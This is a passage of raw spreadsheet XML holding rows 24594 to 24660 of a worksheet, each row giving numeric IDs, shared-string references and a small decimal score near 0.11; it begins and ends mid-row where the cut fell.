        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="24594" ht="15.75" customHeight="1">
      <c r="A24594" s="1">
        <v>14539.0</v>
      </c>
      <c r="B24594" s="2">
        <v>3.9886705E7</v>
      </c>
      <c r="C24594" s="2" t="s">
        <v>23674</v>
      </c>
      <c r="D24594" s="2">
        <v>1.0</v>
      </c>
      <c r="E24594" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24594" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="24595" ht="15.75" customHeight="1">
      <c r="A24595" s="1">
        <v>33119.0</v>
      </c>
      <c r="B24595" s="2">
        <v>7000890.0</v>
      </c>
      <c r="C24595" s="2" t="s">
        <v>23675</v>
      </c>
      <c r="D24595" s="2">
        <v>1.0</v>
      </c>
      <c r="E24595" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24595" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="24596" ht="15.75" customHeight="1">
      <c r="A24596" s="1">
        <v>17238.0</v>
      </c>
      <c r="B24596" s="2">
        <v>4.907855E7</v>
      </c>
      <c r="C24596" s="2" t="s">
        <v>23676</v>
      </c>
      <c r="D24596" s="2">
        <v>1.0</v>
      </c>
      <c r="E24596" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24596" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="24597" ht="15.75" customHeight="1">
      <c r="A24597" s="1">
        <v>20830.0</v>
      </c>
      <c r="B24597" s="2">
        <v>1.5501624E7</v>
      </c>
      <c r="C24597" s="2" t="s">
        <v>23677</v>
      </c>
      <c r="D24597" s="2">
        <v>1.0</v>
      </c>
      <c r="E24597" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24597" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="24598" ht="15.75" customHeight="1">
      <c r="A24598" s="1">
        <v>29188.0</v>
      </c>
      <c r="B24598" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C24598" s="2" t="s">
        <v>23678</v>
      </c>
      <c r="D24598" s="2">
        <v>1.0</v>
      </c>
      <c r="E24598" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24598" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="24599" ht="15.75" customHeight="1">
      <c r="A24599" s="1">
        <v>62.0</v>
      </c>
      <c r="B24599" s="2">
        <v>1.1214563E7</v>
      </c>
      <c r="C24599" s="2" t="s">
        <v>23679</v>
      </c>
      <c r="D24599" s="2">
        <v>1.0</v>
      </c>
      <c r="E24599" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24599" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="24600" ht="15.75" customHeight="1">
      <c r="A24600" s="1">
        <v>24973.0</v>
      </c>
      <c r="B24600" s="2">
        <v>1.266346E7</v>
      </c>
      <c r="C24600" s="2" t="s">
        <v>23680</v>
      </c>
      <c r="D24600" s="2">
        <v>1.0</v>
      </c>
      <c r="E24600" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24600" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="24601" ht="15.75" customHeight="1">
      <c r="A24601" s="1">
        <v>26750.0</v>
      </c>
      <c r="B24601" s="2">
        <v>1.8379652E7</v>
      </c>
      <c r="C24601" s="2" t="s">
        <v>23681</v>
      </c>
      <c r="D24601" s="2">
        <v>1.0</v>
      </c>
      <c r="E24601" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24601" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="24602" ht="15.75" customHeight="1">
      <c r="A24602" s="1">
        <v>18187.0</v>
      </c>
      <c r="B24602" s="2">
        <v>5.2025358E7</v>
      </c>
      <c r="C24602" s="2" t="s">
        <v>23682</v>
      </c>
      <c r="D24602" s="2">
        <v>1.0</v>
      </c>
      <c r="E24602" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24602" s="2">
        <v>0.111965811965812</v>
      </c>
    </row>
    <row r="24603" ht="15.75" customHeight="1">
      <c r="A24603" s="1">
        <v>25394.0</v>
      </c>
      <c r="B24603" s="2">
        <v>1.3704295E7</v>
      </c>
      <c r="C24603" s="2" t="s">
        <v>23683</v>
      </c>
      <c r="D24603" s="2">
        <v>1.0</v>
      </c>
      <c r="E24603" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24603" s="2">
        <v>0.1102693602693603</v>
      </c>
    </row>
    <row r="24604" ht="15.75" customHeight="1">
      <c r="A24604" s="1">
        <v>33724.0</v>
      </c>
      <c r="B24604" s="2">
        <v>8521785.0</v>
      </c>
      <c r="C24604" s="2" t="s">
        <v>23684</v>
      </c>
      <c r="D24604" s="2">
        <v>1.0</v>
      </c>
      <c r="E24604" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24604" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="24605" ht="15.75" customHeight="1">
      <c r="A24605" s="1">
        <v>4305.0</v>
      </c>
      <c r="B24605" s="2">
        <v>4.1956619E7</v>
      </c>
      <c r="C24605" s="2" t="s">
        <v>23685</v>
      </c>
      <c r="D24605" s="2">
        <v>1.0</v>
      </c>
      <c r="E24605" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24605" s="2">
        <v>0.1102292768959435</v>
      </c>
    </row>
    <row r="24606" ht="15.75" customHeight="1">
      <c r="A24606" s="1">
        <v>33681.0</v>
      </c>
      <c r="B24606" s="2">
        <v>8434282.0</v>
      </c>
      <c r="C24606" s="2" t="s">
        <v>23686</v>
      </c>
      <c r="D24606" s="2">
        <v>1.0</v>
      </c>
      <c r="E24606" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24606" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="24607" ht="15.75" customHeight="1">
      <c r="A24607" s="1">
        <v>11242.0</v>
      </c>
      <c r="B24607" s="2">
        <v>2.0419358E7</v>
      </c>
      <c r="C24607" s="2" t="s">
        <v>23687</v>
      </c>
      <c r="D24607" s="2">
        <v>1.0</v>
      </c>
      <c r="E24607" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24607" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="24608" ht="15.75" customHeight="1">
      <c r="A24608" s="1">
        <v>24274.0</v>
      </c>
      <c r="B24608" s="2">
        <v>1.0531217E7</v>
      </c>
      <c r="C24608" s="2" t="s">
        <v>23688</v>
      </c>
      <c r="D24608" s="2">
        <v>1.0</v>
      </c>
      <c r="E24608" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24608" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="24609" ht="15.75" customHeight="1">
      <c r="A24609" s="1">
        <v>24400.0</v>
      </c>
      <c r="B24609" s="2">
        <v>1.0802124E7</v>
      </c>
      <c r="C24609" s="2" t="s">
        <v>23689</v>
      </c>
      <c r="D24609" s="2">
        <v>1.0</v>
      </c>
      <c r="E24609" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24609" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="24610" ht="15.75" customHeight="1">
      <c r="A24610" s="1">
        <v>2640.0</v>
      </c>
      <c r="B24610" s="2">
        <v>3.4598983E7</v>
      </c>
      <c r="C24610" s="2" t="s">
        <v>23690</v>
      </c>
      <c r="D24610" s="2">
        <v>1.0</v>
      </c>
      <c r="E24610" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24610" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="24611" ht="15.75" customHeight="1">
      <c r="A24611" s="1">
        <v>30733.0</v>
      </c>
      <c r="B24611" s="2">
        <v>4.396894E7</v>
      </c>
      <c r="C24611" s="2" t="s">
        <v>23691</v>
      </c>
      <c r="D24611" s="2">
        <v>1.0</v>
      </c>
      <c r="E24611" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24611" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="24612" ht="15.75" customHeight="1">
      <c r="A24612" s="1">
        <v>25104.0</v>
      </c>
      <c r="B24612" s="2">
        <v>1.2950567E7</v>
      </c>
      <c r="C24612" s="2" t="s">
        <v>23692</v>
      </c>
      <c r="D24612" s="2">
        <v>1.0</v>
      </c>
      <c r="E24612" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24612" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="24613" ht="15.75" customHeight="1">
      <c r="A24613" s="1">
        <v>19962.0</v>
      </c>
      <c r="B24613" s="2">
        <v>5.7546942E7</v>
      </c>
      <c r="C24613" s="2" t="s">
        <v>23693</v>
      </c>
      <c r="D24613" s="2">
        <v>1.0</v>
      </c>
      <c r="E24613" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24613" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="24614" ht="15.75" customHeight="1">
      <c r="A24614" s="1">
        <v>21502.0</v>
      </c>
      <c r="B24614" s="2">
        <v>2.3113672E7</v>
      </c>
      <c r="C24614" s="2" t="s">
        <v>23694</v>
      </c>
      <c r="D24614" s="2">
        <v>1.0</v>
      </c>
      <c r="E24614" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24614" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="24615" ht="15.75" customHeight="1">
      <c r="A24615" s="1">
        <v>28104.0</v>
      </c>
      <c r="B24615" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C24615" s="2" t="s">
        <v>23695</v>
      </c>
      <c r="D24615" s="2">
        <v>1.0</v>
      </c>
      <c r="E24615" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24615" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="24616" ht="15.75" customHeight="1">
      <c r="A24616" s="1">
        <v>2544.0</v>
      </c>
      <c r="B24616" s="2">
        <v>3.4121058E7</v>
      </c>
      <c r="C24616" s="2" t="s">
        <v>23696</v>
      </c>
      <c r="D24616" s="2">
        <v>1.0</v>
      </c>
      <c r="E24616" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24616" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24617" ht="15.75" customHeight="1">
      <c r="A24617" s="1">
        <v>2858.0</v>
      </c>
      <c r="B24617" s="2">
        <v>3.5528163E7</v>
      </c>
      <c r="C24617" s="2" t="s">
        <v>23697</v>
      </c>
      <c r="D24617" s="2">
        <v>1.0</v>
      </c>
      <c r="E24617" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24617" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24618" ht="15.75" customHeight="1">
      <c r="A24618" s="1">
        <v>3367.0</v>
      </c>
      <c r="B24618" s="2">
        <v>3.7897848E7</v>
      </c>
      <c r="C24618" s="2" t="s">
        <v>23698</v>
      </c>
      <c r="D24618" s="2">
        <v>1.0</v>
      </c>
      <c r="E24618" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24618" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24619" ht="15.75" customHeight="1">
      <c r="A24619" s="1">
        <v>7077.0</v>
      </c>
      <c r="B24619" s="2">
        <v>5.0261767E7</v>
      </c>
      <c r="C24619" s="2" t="s">
        <v>23699</v>
      </c>
      <c r="D24619" s="2">
        <v>1.0</v>
      </c>
      <c r="E24619" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24619" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24620" ht="15.75" customHeight="1">
      <c r="A24620" s="1">
        <v>7417.0</v>
      </c>
      <c r="B24620" s="2">
        <v>5.1142982E7</v>
      </c>
      <c r="C24620" s="2" t="s">
        <v>23700</v>
      </c>
      <c r="D24620" s="2">
        <v>1.0</v>
      </c>
      <c r="E24620" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24620" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24621" ht="15.75" customHeight="1">
      <c r="A24621" s="1">
        <v>7946.0</v>
      </c>
      <c r="B24621" s="2">
        <v>5.2634678E7</v>
      </c>
      <c r="C24621" s="2" t="s">
        <v>23701</v>
      </c>
      <c r="D24621" s="2">
        <v>1.0</v>
      </c>
      <c r="E24621" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24621" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24622" ht="15.75" customHeight="1">
      <c r="A24622" s="1">
        <v>9661.0</v>
      </c>
      <c r="B24622" s="2">
        <v>5.6300725E7</v>
      </c>
      <c r="C24622" s="2" t="s">
        <v>23702</v>
      </c>
      <c r="D24622" s="2">
        <v>1.0</v>
      </c>
      <c r="E24622" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24622" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24623" ht="15.75" customHeight="1">
      <c r="A24623" s="1">
        <v>10085.0</v>
      </c>
      <c r="B24623" s="2">
        <v>5.7170248E7</v>
      </c>
      <c r="C24623" s="2" t="s">
        <v>23703</v>
      </c>
      <c r="D24623" s="2">
        <v>1.0</v>
      </c>
      <c r="E24623" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24623" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24624" ht="15.75" customHeight="1">
      <c r="A24624" s="1">
        <v>10933.0</v>
      </c>
      <c r="B24624" s="2">
        <v>1.6953325E7</v>
      </c>
      <c r="C24624" s="2" t="s">
        <v>23704</v>
      </c>
      <c r="D24624" s="2">
        <v>1.0</v>
      </c>
      <c r="E24624" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24624" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24625" ht="15.75" customHeight="1">
      <c r="A24625" s="1">
        <v>11116.0</v>
      </c>
      <c r="B24625" s="2">
        <v>1.8885596E7</v>
      </c>
      <c r="C24625" s="2" t="s">
        <v>23705</v>
      </c>
      <c r="D24625" s="2">
        <v>1.0</v>
      </c>
      <c r="E24625" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24625" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24626" ht="15.75" customHeight="1">
      <c r="A24626" s="1">
        <v>11974.0</v>
      </c>
      <c r="B24626" s="2">
        <v>2.5765259E7</v>
      </c>
      <c r="C24626" s="2" t="s">
        <v>23706</v>
      </c>
      <c r="D24626" s="2">
        <v>1.0</v>
      </c>
      <c r="E24626" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24626" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24627" ht="15.75" customHeight="1">
      <c r="A24627" s="1">
        <v>12264.0</v>
      </c>
      <c r="B24627" s="2">
        <v>2.802845E7</v>
      </c>
      <c r="C24627" s="2" t="s">
        <v>23707</v>
      </c>
      <c r="D24627" s="2">
        <v>1.0</v>
      </c>
      <c r="E24627" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24627" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24628" ht="15.75" customHeight="1">
      <c r="A24628" s="1">
        <v>12554.0</v>
      </c>
      <c r="B24628" s="2">
        <v>2.9879298E7</v>
      </c>
      <c r="C24628" s="2" t="s">
        <v>23708</v>
      </c>
      <c r="D24628" s="2">
        <v>1.0</v>
      </c>
      <c r="E24628" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24628" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24629" ht="15.75" customHeight="1">
      <c r="A24629" s="1">
        <v>13778.0</v>
      </c>
      <c r="B24629" s="2">
        <v>3655529.0</v>
      </c>
      <c r="C24629" s="2" t="s">
        <v>23709</v>
      </c>
      <c r="D24629" s="2">
        <v>1.0</v>
      </c>
      <c r="E24629" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24629" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24630" ht="15.75" customHeight="1">
      <c r="A24630" s="1">
        <v>14016.0</v>
      </c>
      <c r="B24630" s="2">
        <v>3.7467232E7</v>
      </c>
      <c r="C24630" s="2" t="s">
        <v>23710</v>
      </c>
      <c r="D24630" s="2">
        <v>1.0</v>
      </c>
      <c r="E24630" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24630" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24631" ht="15.75" customHeight="1">
      <c r="A24631" s="1">
        <v>14483.0</v>
      </c>
      <c r="B24631" s="2">
        <v>3.9552576E7</v>
      </c>
      <c r="C24631" s="5" t="s">
        <v>23711</v>
      </c>
      <c r="D24631" s="2">
        <v>1.0</v>
      </c>
      <c r="E24631" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24631" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24632" ht="15.75" customHeight="1">
      <c r="A24632" s="1">
        <v>17425.0</v>
      </c>
      <c r="B24632" s="2">
        <v>4.9715527E7</v>
      </c>
      <c r="C24632" s="2" t="s">
        <v>23712</v>
      </c>
      <c r="D24632" s="2">
        <v>1.0</v>
      </c>
      <c r="E24632" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24632" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24633" ht="15.75" customHeight="1">
      <c r="A24633" s="1">
        <v>18304.0</v>
      </c>
      <c r="B24633" s="2">
        <v>5.235459E7</v>
      </c>
      <c r="C24633" s="2" t="s">
        <v>23713</v>
      </c>
      <c r="D24633" s="2">
        <v>1.0</v>
      </c>
      <c r="E24633" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24633" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24634" ht="15.75" customHeight="1">
      <c r="A24634" s="1">
        <v>19258.0</v>
      </c>
      <c r="B24634" s="2">
        <v>5.5126015E7</v>
      </c>
      <c r="C24634" s="2" t="s">
        <v>23714</v>
      </c>
      <c r="D24634" s="2">
        <v>1.0</v>
      </c>
      <c r="E24634" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24634" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24635" ht="15.75" customHeight="1">
      <c r="A24635" s="1">
        <v>20268.0</v>
      </c>
      <c r="B24635" s="2">
        <v>1.108538E7</v>
      </c>
      <c r="C24635" s="2" t="s">
        <v>23715</v>
      </c>
      <c r="D24635" s="2">
        <v>1.0</v>
      </c>
      <c r="E24635" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24635" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24636" ht="15.75" customHeight="1">
      <c r="A24636" s="1">
        <v>20578.0</v>
      </c>
      <c r="B24636" s="2">
        <v>1.3664228E7</v>
      </c>
      <c r="C24636" s="2" t="s">
        <v>23716</v>
      </c>
      <c r="D24636" s="2">
        <v>1.0</v>
      </c>
      <c r="E24636" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24636" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24637" ht="15.75" customHeight="1">
      <c r="A24637" s="1">
        <v>20820.0</v>
      </c>
      <c r="B24637" s="2">
        <v>1.5394244E7</v>
      </c>
      <c r="C24637" s="2" t="s">
        <v>23717</v>
      </c>
      <c r="D24637" s="2">
        <v>1.0</v>
      </c>
      <c r="E24637" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24637" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24638" ht="15.75" customHeight="1">
      <c r="A24638" s="1">
        <v>20984.0</v>
      </c>
      <c r="B24638" s="2">
        <v>1.6999989E7</v>
      </c>
      <c r="C24638" s="2" t="s">
        <v>23718</v>
      </c>
      <c r="D24638" s="2">
        <v>1.0</v>
      </c>
      <c r="E24638" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24638" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24639" ht="15.75" customHeight="1">
      <c r="A24639" s="1">
        <v>21207.0</v>
      </c>
      <c r="B24639" s="2">
        <v>1.9527636E7</v>
      </c>
      <c r="C24639" s="2" t="s">
        <v>23719</v>
      </c>
      <c r="D24639" s="2">
        <v>1.0</v>
      </c>
      <c r="E24639" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24639" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24640" ht="15.75" customHeight="1">
      <c r="A24640" s="1">
        <v>21221.0</v>
      </c>
      <c r="B24640" s="2">
        <v>1.9608542E7</v>
      </c>
      <c r="C24640" s="2" t="s">
        <v>23720</v>
      </c>
      <c r="D24640" s="2">
        <v>1.0</v>
      </c>
      <c r="E24640" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24640" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24641" ht="15.75" customHeight="1">
      <c r="A24641" s="1">
        <v>22028.0</v>
      </c>
      <c r="B24641" s="2">
        <v>3.0131208E7</v>
      </c>
      <c r="C24641" s="2" t="s">
        <v>23721</v>
      </c>
      <c r="D24641" s="2">
        <v>1.0</v>
      </c>
      <c r="E24641" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24641" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24642" ht="15.75" customHeight="1">
      <c r="A24642" s="1">
        <v>22346.0</v>
      </c>
      <c r="B24642" s="2">
        <v>3.4560577E7</v>
      </c>
      <c r="C24642" s="2" t="s">
        <v>23722</v>
      </c>
      <c r="D24642" s="2">
        <v>1.0</v>
      </c>
      <c r="E24642" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24642" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24643" ht="15.75" customHeight="1">
      <c r="A24643" s="1">
        <v>22532.0</v>
      </c>
      <c r="B24643" s="2">
        <v>3.7904333E7</v>
      </c>
      <c r="C24643" s="2" t="s">
        <v>23723</v>
      </c>
      <c r="D24643" s="2">
        <v>1.0</v>
      </c>
      <c r="E24643" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24643" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24644" ht="15.75" customHeight="1">
      <c r="A24644" s="1">
        <v>22918.0</v>
      </c>
      <c r="B24644" s="2">
        <v>4.8330948E7</v>
      </c>
      <c r="C24644" s="2" t="s">
        <v>23724</v>
      </c>
      <c r="D24644" s="2">
        <v>1.0</v>
      </c>
      <c r="E24644" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24644" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24645" ht="15.75" customHeight="1">
      <c r="A24645" s="1">
        <v>23318.0</v>
      </c>
      <c r="B24645" s="2">
        <v>5.4354877E7</v>
      </c>
      <c r="C24645" s="2" t="s">
        <v>23725</v>
      </c>
      <c r="D24645" s="2">
        <v>1.0</v>
      </c>
      <c r="E24645" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24645" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24646" ht="15.75" customHeight="1">
      <c r="A24646" s="1">
        <v>23610.0</v>
      </c>
      <c r="B24646" s="2">
        <v>6423394.0</v>
      </c>
      <c r="C24646" s="2" t="s">
        <v>23726</v>
      </c>
      <c r="D24646" s="2">
        <v>1.0</v>
      </c>
      <c r="E24646" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24646" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24647" ht="15.75" customHeight="1">
      <c r="A24647" s="1">
        <v>24041.0</v>
      </c>
      <c r="B24647" s="2">
        <v>9510202.0</v>
      </c>
      <c r="C24647" s="2" t="s">
        <v>23727</v>
      </c>
      <c r="D24647" s="2">
        <v>1.0</v>
      </c>
      <c r="E24647" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24647" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24648" ht="15.75" customHeight="1">
      <c r="A24648" s="1">
        <v>24318.0</v>
      </c>
      <c r="B24648" s="2">
        <v>1.0620503E7</v>
      </c>
      <c r="C24648" s="2" t="s">
        <v>23728</v>
      </c>
      <c r="D24648" s="2">
        <v>1.0</v>
      </c>
      <c r="E24648" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24648" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24649" ht="15.75" customHeight="1">
      <c r="A24649" s="1">
        <v>24371.0</v>
      </c>
      <c r="B24649" s="2">
        <v>1.0754724E7</v>
      </c>
      <c r="C24649" s="2" t="s">
        <v>23729</v>
      </c>
      <c r="D24649" s="2">
        <v>1.0</v>
      </c>
      <c r="E24649" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24649" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24650" ht="15.75" customHeight="1">
      <c r="A24650" s="1">
        <v>24426.0</v>
      </c>
      <c r="B24650" s="2">
        <v>1.0851147E7</v>
      </c>
      <c r="C24650" s="2" t="s">
        <v>23730</v>
      </c>
      <c r="D24650" s="2">
        <v>1.0</v>
      </c>
      <c r="E24650" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24650" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24651" ht="15.75" customHeight="1">
      <c r="A24651" s="1">
        <v>24507.0</v>
      </c>
      <c r="B24651" s="2">
        <v>1.1120088E7</v>
      </c>
      <c r="C24651" s="2" t="s">
        <v>23731</v>
      </c>
      <c r="D24651" s="2">
        <v>1.0</v>
      </c>
      <c r="E24651" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24651" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24652" ht="15.75" customHeight="1">
      <c r="A24652" s="1">
        <v>25383.0</v>
      </c>
      <c r="B24652" s="2">
        <v>1.3664227E7</v>
      </c>
      <c r="C24652" s="2" t="s">
        <v>23732</v>
      </c>
      <c r="D24652" s="2">
        <v>1.0</v>
      </c>
      <c r="E24652" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24652" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24653" ht="15.75" customHeight="1">
      <c r="A24653" s="1">
        <v>25473.0</v>
      </c>
      <c r="B24653" s="2">
        <v>1.4006083E7</v>
      </c>
      <c r="C24653" s="2" t="s">
        <v>23733</v>
      </c>
      <c r="D24653" s="2">
        <v>1.0</v>
      </c>
      <c r="E24653" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24653" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24654" ht="15.75" customHeight="1">
      <c r="A24654" s="1">
        <v>25887.0</v>
      </c>
      <c r="B24654" s="2">
        <v>1.4972945E7</v>
      </c>
      <c r="C24654" s="2" t="s">
        <v>23734</v>
      </c>
      <c r="D24654" s="2">
        <v>1.0</v>
      </c>
      <c r="E24654" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24654" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24655" ht="15.75" customHeight="1">
      <c r="A24655" s="1">
        <v>26792.0</v>
      </c>
      <c r="B24655" s="2">
        <v>1.8611733E7</v>
      </c>
      <c r="C24655" s="2" t="s">
        <v>23735</v>
      </c>
      <c r="D24655" s="2">
        <v>1.0</v>
      </c>
      <c r="E24655" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24655" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24656" ht="15.75" customHeight="1">
      <c r="A24656" s="1">
        <v>27123.0</v>
      </c>
      <c r="B24656" s="2">
        <v>2.071688E7</v>
      </c>
      <c r="C24656" s="2" t="s">
        <v>23736</v>
      </c>
      <c r="D24656" s="2">
        <v>1.0</v>
      </c>
      <c r="E24656" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24656" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24657" ht="15.75" customHeight="1">
      <c r="A24657" s="1">
        <v>27150.0</v>
      </c>
      <c r="B24657" s="2">
        <v>2.0781953E7</v>
      </c>
      <c r="C24657" s="2" t="s">
        <v>23737</v>
      </c>
      <c r="D24657" s="2">
        <v>1.0</v>
      </c>
      <c r="E24657" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24657" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24658" ht="15.75" customHeight="1">
      <c r="A24658" s="1">
        <v>27413.0</v>
      </c>
      <c r="B24658" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C24658" s="2" t="s">
        <v>23738</v>
      </c>
      <c r="D24658" s="2">
        <v>1.0</v>
      </c>
      <c r="E24658" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24658" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24659" ht="15.75" customHeight="1">
      <c r="A24659" s="1">
        <v>27548.0</v>
      </c>
      <c r="B24659" s="2">
        <v>2.2335486E7</v>
      </c>
      <c r="C24659" s="2" t="s">
        <v>23739</v>
      </c>
      <c r="D24659" s="2">
        <v>1.0</v>
      </c>
      <c r="E24659" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24659" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="24660" ht="15.75" customHeight="1">
      <c r="A24660" s="1">
        <v>27680.0</v>
      </c>
      <c r="B24660" s="2">
        <v>2.2972405E7</v>
      </c>
      <c r="C24660" s="2" t="s">
        <v>23740</v>
      </c>
      <c r="D24660" s="2">
        <v>1.0</v>
      </c>
      <c r="E24660" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24660" s="2">
